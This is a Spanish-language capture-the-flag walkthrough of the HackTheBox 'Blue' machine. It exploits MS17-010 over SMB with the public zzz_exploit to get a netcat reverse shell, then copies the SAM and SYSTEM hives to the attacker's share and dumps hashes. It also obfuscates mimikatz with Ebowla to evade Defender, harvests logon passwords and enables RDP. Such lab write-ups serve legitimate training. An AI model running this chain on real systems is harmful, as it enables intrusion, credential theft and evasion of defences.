BLUE - HackMD

# BLUE ## Reconocimiento ### nmap ``` nmap -sS --min-rate 5000 -p- -Pn -n 10.10.10.40 -oG allPorts ``` ![](https://i.imgur.com/5Rwk0IO.png) ``` ┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/BLUE] └──╼ #nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 13:33 -05 Nmap scan report for 10.10.10.40 Host is up (0.22s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-07-22T23:35:43 |_ start_date: 2022-07-22T22:45:41 | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-07-23T00:35:44+01:00 |_clock-skew: mean: 4h40m03s, deviation: 34m35s, median: 5h00m01s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 117.40 seconds ``` ### crackmapexec ``` cme smb 10.10.10.40 ``` ![](https://i.imgur.com/Ys7oqDD.png) Para ver las categorías que existen en los scripts `.nse`: ``` locate .nse | xargs grep "categories" | grep -oP '".*?"' | sort -u ``` ![](https://i.imgur.com/jxlnM4X.png) De las cuales se usarán las categorias "vuln" y "safe": ``` nmap --script "vuln and safe" -p135,139,445 10.10.10.40 ``` ![](https://i.imgur.com/pAQz8QB.png) ``` nmap --script smb-vuln* -p139,445 10.10.10.40 ``` ![](https://i.imgur.com/oBqNzZM.png) Vemos que es vulnerable al ms17-010 ## Explotación Manual - zzz_exploit ``` https://github.com/worawit/MS17-010 ``` ``` python2 checker.py 10.10.10.40 ``` ![](https://i.imgur.com/LhlmMzu.png) Si en alguno de los named pipes aparece como `OK` ya tenemos la posibilidad de ejecutar comandos Cambiar USERNAME = 'guest' en algunos casos puede servir ![](https://i.imgur.com/WX6k2lK.png) ``` python2 checker.py 10.10.10.40 ``` ![](https://i.imgur.com/YYbcjne.png) También editar el archivo zzz_exploit.py en USERNAME = 'guest' ![](https://i.imgur.com/2n4n3B8.png) ![](https://i.imgur.com/P62Ntdf.png) Ahora descargamos el nc `https://eternallybored.org/misc/netcat/` ``` impacket-smbserver smbFolder $(pwd) -smb2support ``` ![](https://i.imgur.com/1Cfrp50.png) ``` python2 zzz_exploit.py 10.10.10.40 samr ``` ![](https://i.imgur.com/MYY0jkz.png) ``` rlwrap nc -nvlp 4343 ``` ![](https://i.imgur.com/TQATR7T.png) ## Post Explotación En ocasiones, en windows las credenciales se almacenan en la memoria las cuales pueden ser dumpeadas con mimikatz. ``` reg save HKLM\system system.backup reg save HKLM\sam sam.backup ``` ![](https://i.imgur.com/VKobRLD.png) ``` copy system.backup \\10.10.14.6\smbFolder\system copy sam.backup \\10.10.14.6\smbFolder\sam ``` ![](https://i.imgur.com/aVXOlR4.png) Se pueden obtener los hashes de los usuarios con la herramienta secretsdump: ``` secretsdump.py -sam sam -system system LOCAL ``` Ahora traemos el mimikatz desde ``` https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2 ``` Para subir el mimikatz hacia la máquina víctima, se hará uso de la herramienta Ebowla para burlar el defender o protecciones existentes en el sistema: ![](https://i.imgur.com/kZu6TYe.png) ### Pass The Hash ![](https://i.imgur.com/KkHchdA.png) ### EBOWLA ![](https://i.imgur.com/LqjPaE4.png) retocamos el `genetic.config` ![](https://i.imgur.com/7jKFC8x.png) ![](https://i.imgur.com/Ih22t9i.png) ``` echo %username% HARIS-PC$ echo %computername% HARIS-PC echo %Number_of_processors% 2 echo %processor_identifier% AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD echo %path% C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\; ``` ![](https://i.imgur.com/wvhuOmu.png) ``` python2 ebowla.py /home/cr4y0/Desktop/HackTheBox/BLUE/mimikatz/x64/mimikatz.exe genetic.config ``` ![](https://i.imgur.com/eEoeFJd.png) ``` ./build_x64_go.sh output/go_symmetric_mimikatz.exe.go final_mimi.exe ``` ![](https://i.imgur.com/QH9Clbg.png) Se transfiere el binario ofuscado ``` .\final_mimi.exe ``` ![](https://i.imgur.com/h4xEUbM.png) ``` privilege::debug ``` ![](https://i.imgur.com/9lGFvbP.png) ``` sekurlsa::logonPasswords ``` ![](https://i.imgur.com/VIzeVMn.png) ``` cme smb 10.10.10.40 -u 'Administrator' -p 'ejfnIWWDojfWEKM' ``` ![](https://i.imgur.com/MiPJhpU.png) ### rdp HAbilitar puerto rdp ``` cme smb 10.10.10.40 -u 'Administrator' -p 'ejfnIWWDojfWEKM' -M rdp -o action=enable ``` ![](https://i.imgur.com/wYjSPao.png) ![](https://i.imgur.com/eXCShoR.png) ## Recursos https://refabr1k.gitbook.io/oscp/info-gathering/smb https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html#nmblookupAnother ``` # smb enum script nmap -p 139,445 --script smb-enum-users <ipaddress_here> # Checks for OS of SMB nmap -v -p 139,445 --script smb-os-discovery 10.11.24.85 #Checks for smb vulnerability nmap -v -p 139,445 --script vuln <ipaddress_here> nmap --script smb-vuln* -p 139,445 [ip] #Dump interesting information nmap --script "safe or smb-enum-*" -p 445 <IP> # Bruteforce User Credentials nmap --script smb-brute -p 445 <IP> #List Shares nmap --script smb-enum-shares -p 139,445 [ip] ```